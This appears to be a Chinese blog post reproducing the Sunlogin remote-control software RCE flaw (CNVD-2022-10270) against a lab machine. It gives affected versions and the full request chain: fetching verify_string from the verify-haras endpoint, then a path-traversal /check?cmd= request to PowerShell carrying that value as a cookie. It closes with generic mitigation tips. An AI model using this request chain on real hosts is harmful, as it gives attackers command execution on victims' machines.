向日葵远程代码执行(CNVD-2022-10270)漏洞复现

0x01 描述

上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)，安装以下存在windwos问题版本的个人版和简约版，攻击者可利用该漏洞获取服务器控制权。

0x02 影响范围

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.43315（2021.12）

0x03 漏洞复现

在靶机安装此漏洞版本内的向日葵(靶机IP:192.168.10.184

工具复现

cmd提示红色就是证明该漏洞

对该端口漏洞进行利用

也可以利用python脚本去ping全部端口加上”/cgi-bin/rpc?action=verify-haras”然后将200网页状态码进行记录返回。

然后访问http://192.168.10.184:50043/cgi-bin/rpc?action=verify-haras

                                                             此页面说明漏洞存在​

再去将​verify_string的值提取出来，去构造GET请求

http://192.168.10.184:50043/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

Cookie是CID=”verify_string的值”​

向日葵漏洞防护为大家找到的解决远程代码执行漏洞的方法有:

1. 输入检查:应用程序必须实现输入检查机制，将所有从外部接收的数据都进行严格的检查和过滤，防止恶意代码被注入。

2. 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句，实现任意代码执行的攻击。

3. 输出编码:在输出时对敏感字符进行编码保护，比如HTML编码，防止恶意代码直接输出执行。

4. 使用最 新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的，确保已知的漏洞都得到修复。

5. 强制访问控制:应该设置访问控制机制，确保恶意用户无法访问敏感数据和代码。​